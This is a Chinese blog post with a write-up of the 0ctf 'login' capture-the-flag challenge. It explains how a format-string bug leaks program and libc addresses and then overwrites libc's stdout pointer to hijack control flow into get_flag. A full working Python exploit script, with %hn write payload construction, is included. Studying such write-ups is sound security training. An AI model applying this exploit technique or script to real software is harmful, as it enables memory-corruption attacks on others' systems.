0ctf login writeup

最新推荐文章于 2024-02-22 21:32:34 发布
最新推荐文章于 2024-02-22 21:32:34 发布
阅读量1.9k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/v_ling_v/article/details/45013879
版权

溢出点:

比较明显的格式化。


利用:

程序进入这个函数之后,只有两次格式化的机会,之后程序就会调用exit退出了。显然第一次格式化是用来泄露用的,第二次是用来改写数据的。

程序为PIE代码,且有aslr,因此所有地址都不是固定的,不过通过第一次格式化,肯定能得到loginlibc的基地址。

主要第二次格式化应该改写什么。因为程序开启了FullRelro,主程序中的函数指针(如GOT表)都位于只读区域,不可改写。而程序在第二次格式化后只调用了2puts,就直接exit了,也没法通过修改堆栈控制程序流程。

后来想到,搞主程序不行,就去搞libc。分析puts函数,发现一个间接调用。Stdout位于libc.data段中。因此想到通过改stdout,来控制程序调用到get_flag函数。


修改stdoutx,为了能到达间接调用需要满足:

  1. x[0:4]&0x8000=1

  2. x[192:196]=0xffffffff

这样程序调用的是 [x+0xd8]+0x38中的内容。

即:

x[x+0xd8]=y

[y+0x38] = get_flag


需要xy值可控,找了一下,最可控的地方是主程序中保存用户名的地方


因此把x=y=0x202040+login_base


整理一下:

x赋值时:x[0:4]&0x8000=1x[192:196]=0xffffffff

第二次格式化时,需要同时改写3个地方:

# stdout <== x

#x+0xd8 <== x

# x+0x38 <==get_flag

完整利用脚本如下:

#encoding:utf-8
from convert import *
import telnetlib
import struct

#ip = '192.168.194.129'
#port = 1234

ip = '202.112.26.107'
port = 10910

t = telnetlib.Telnet(ip, port)

def stop():
    raw_input('pause')

def init():
    t.read_until('Login:')

    t.write('guest\n')
    t.read_until('Password:')
    t.write('guest123\n')


def login():
    t.read_until('Your choice:')
    t.write('2\n')
    t.read_until('name:')
    t.write('\x81'*4+'A'*188+'\xff'*4+'a'*(256-196))


def login_as_root():
    t.read_until('choice:')
    t.write('4\n')
    t.write('%75$p%79$p\n')
    t.read_until('Password:')
    t.write('passwd\n')
    data = t.read_until('login').split('login')[0].strip()
    mainbase = int(data.split('0x')[1], 16) -0x12d3
    libcbase = int(data.split('0x')[2], 16) - 0x21ec5

    print hex(libcbase)
    print hex(mainbase)

    stdout = libcbase + 0x3bf870
    x = mainbase + 0x202040
    get_flag = mainbase + 0xfb3

    print 'stdout', hex(stdout)
    print 'x',hex(x)
    print 'getflag', hex(get_flag)

    # stdout <== x
    # x+0xd8 <== x
    # x+0x38 <== get_flag
    print 'x+0xd8', hex(x+0xd8)
    print 'x+0x38', hex(x+0x38)
    rt = []
    rt.append(x&0xffff)
    rt.append((x>>16)&0xffff)
    rt.append((x>>32)&0xffff)
    rt.append(x&0xffff)
    rt.append((x>>16)&0xffff)
    rt.append((x>>32)&0xffff)
    rt.append(get_flag&0xffff)
    rt.append((get_flag>>16)&0xffff)
    rt.append((get_flag>>32)&0xffff)

    rt.sort()

    rt2 = []
    rt2.append(x&0xffff)
    rt2.append((x>>16)&0xffff)
    rt2.append((x>>32)&0xffff)
    rt2.append(x&0xffff)
    rt2.append((x>>16)&0xffff)
    rt2.append((x>>32)&0xffff)
    rt2.append(get_flag&0xffff)
    rt2.append((get_flag>>16)&0xffff)
    rt2.append((get_flag>>32)&0xffff)

    rt3=[stdout, stdout+2, stdout+4, x+0xd8, x+0xd8+2, x+0xd8+4, x+0x38, x+0x38+2, x+0x38+4]

    print 'rt', rt
    print 'rt2', rt2
    print 'rt3', rt3

    final_l = ''
    final_r = ''
    index = 14 + 2 + 7

    final_l = '%22$hn%23$hn'
    final_r = l64(x+0xd8+6)+l64(x+0x38+6)
    for i in range(len(rt)):
        if i != 0:
            if rt[i] == rt[i-1]:
                continue
        if i == 0:
            temp = rt[i]
        else:
            temp = rt[i] - rt[i-1]
        final_l += '%'+str(temp)+'x'
        for j in range(len(rt2)):
            if rt2[j] == rt[i]:
                final_l += '%'+str(index+1)+'$hn'
                final_r += l64(rt3[j])
                index += 1
    print len(final_l)
    final_l += '0' * (8 * 14 - len(final_l))
    shellcode = final_l + final_r + '\n'
    print repr(shellcode)

    t.read_until('Login')
    t.write(shellcode)

    t.read_until('Password')
    t.write('12345\n')

def exp():
    stop()
    init()
    login()
    t.write('1\n')
    login_as_root()
    t.interact()

exp()


ling13579
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 4440
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
[HFCTF2020]EasyLogin --不会编程崽
最新发布
不会编程的崽的博客
02-22 522
koa&jwt伪造
i春秋ctf---2017广东省强网杯---web---writeup
gclome的博客
11-14 571
broken 打开是这样的: 点击 file ,出现jsfuck代码, Jsfuck代码的执行方法: ①复制 ②打开firefox浏览器 ③按下F12 ④选择上方的控制台 ⑤在下方粘贴是jsfuck代码 ⑥按下回车即可运行 把jsfuck代码放到控制器里运行,按照代码表进行审计,发现有[]没有闭合,把最后的()删掉,加上 ] ,解析出 Array[…],点击打开即可得到flag。 who ...
[CTF]No.0007 [强网杯] phone number
林毅洋
05-14 865
[CTF]No.0006 [强网杯] phone number Phone number is a good thing. 来源:强网杯-第二届-WEB 类别:16进制绕过 sql注入 来源:https://gdqwb2017.ichunqiu.com/competition/index 用到工具:无 尝试 进入地址,首先alert一个please login!接着跳转到首页
百度杯”CTF比赛 十月场 login
Naptmn的博客
11-16 850
1、打开题目 打开题目发现是登录窗口,之后f12发现疑似账号密码的东西,之后输入发现确实是账号密码。 登录之后发现了一串颜文字。 2、bp抓包 因为已经找到了账号密码,所以大概率就不是注入了。之后考虑302跳转,所以进行bp抓包(记得抓的是登录后的包!!!别抓错了)。 并没有跳转,但是在response中发现一个奇怪的参数show:0,考虑是不是应该把他放到包里再来一次。试试就试试。 传递方式注意的是:上面的网址看清楚(我不知道为什么会莫名多出来几个包) show:后面加个空格 之后看response
阿里云ctf比赛writeup
04-26
阿里云ctf比赛writeup ,包含web,misc,pwn,reverse,crypto.
CTF-writeup
03-19
CTF-writeup
CTF_writeup
02-20
CTF_writeup
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
bugku-CTFlogin2(SKCTF)(hint:union,命令执行)
Abc_Kimball的博客
01-31 662
本题要点:union绕过、命令执行、脚本编写、base64编码 进入页面 使用弱口令破解,一顿弱口令没卵用 抓包查看不用抓包,直接发送到repeater并且go 看见tip有些乱码,拿走解码,base64解密 sql="SELECTusername,passwordFROMadminWHEREusername=′".sql="SELECT username,password FROM admin WHERE username='".sql="SELECTusername,passwordFROMadmin
BugKu-CTF(web篇)---login2
Nailaoyyds的博客
04-02 3372
目录 login2 base64解码 审计分析语句 制作payload 拿到flag login2 从登录框入手 抓包分析一下,发现了一个小tip base64解码 审计分析语句 审计一下:想要登录成功,可以 通过输入不存在用户,用union select 构造出指定密码的md5值这样 payload为username=admin' union select 1,md5(123)#&passwor...
0ctf writeup
weixin_34384915的博客
03-08 1840
felixk3y · 2016/03/17 10:24Author:双螺旋安全研究院0x00 Rand_2(web)访问http://202.120.7.202:8888/,即可获取到题目的源码:#!php &lt;?php include('config.php'); session_start(); if($_SESSION['time'] &amp;&amp; time() - $_...
CTF/CTF练习平台-login1【sql约束攻击】
Sp4rkW的博客
09-14 4315
原题内容: http://47.93.190.246:49163/ flag格式:SKCTF{xxxxxxxxxxxxxxxxx} hint:SQL约束攻击 约束攻击这里不做详解了,详解见我的博客基于约束的SQL攻击 【电脑环境mysql实测漏洞已经修补】 题目提示很明显了,这里直接几个截图解释下做题思路: 提示admin存在,尝试admin...
BugKuCTF中套路满满的题-------login3(SKCTF)
qq_42133828的博客
02-09 3008
根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜 然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。 首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。): 再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句 username='^(1)^1...
[pwn]格式化字符串:0ctf 2015 login writeup
Breeze的博客
09-26 9100
文章目录格式化字符串:0ctf 2015 login writeup格式化字符串漏洞题目分析利用思路开始利用 格式化字符串:0ctf 2015 login writeup 格式化字符串漏洞 格式化字符串漏洞是不正确的使用printf函数导致的,为了简便使用printf(s),而s是用户可控的字符串,就会导致任意地址读和任意地址写漏洞。**归根结底,由于printf的参数个数是不确定的,而函数本身根...
mysql 登录框注入_CTF| SQL注入之login界面类
weixin_34609222的博客
01-19 2488
SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。万能密码—very easy题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php题目来源:hacking lab inject 01~源代码有提...
0ctf simpleapk writeup
ling
04-12 2003
Java层分析 Init中生成flag.txt 按键处理中,将用户输入与flag.txt中内容比较。 直接在手机上找到了flag.txt文件,得到内容如下: 0ctf{Too_Simple_Sometimes_Naive!!!} 提交,发现不对。 So分析: 定位到init函数 猜测应该是so库对read函数进行了hook,导致java层读取的数
ctf从0到1电子书
12-14
CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值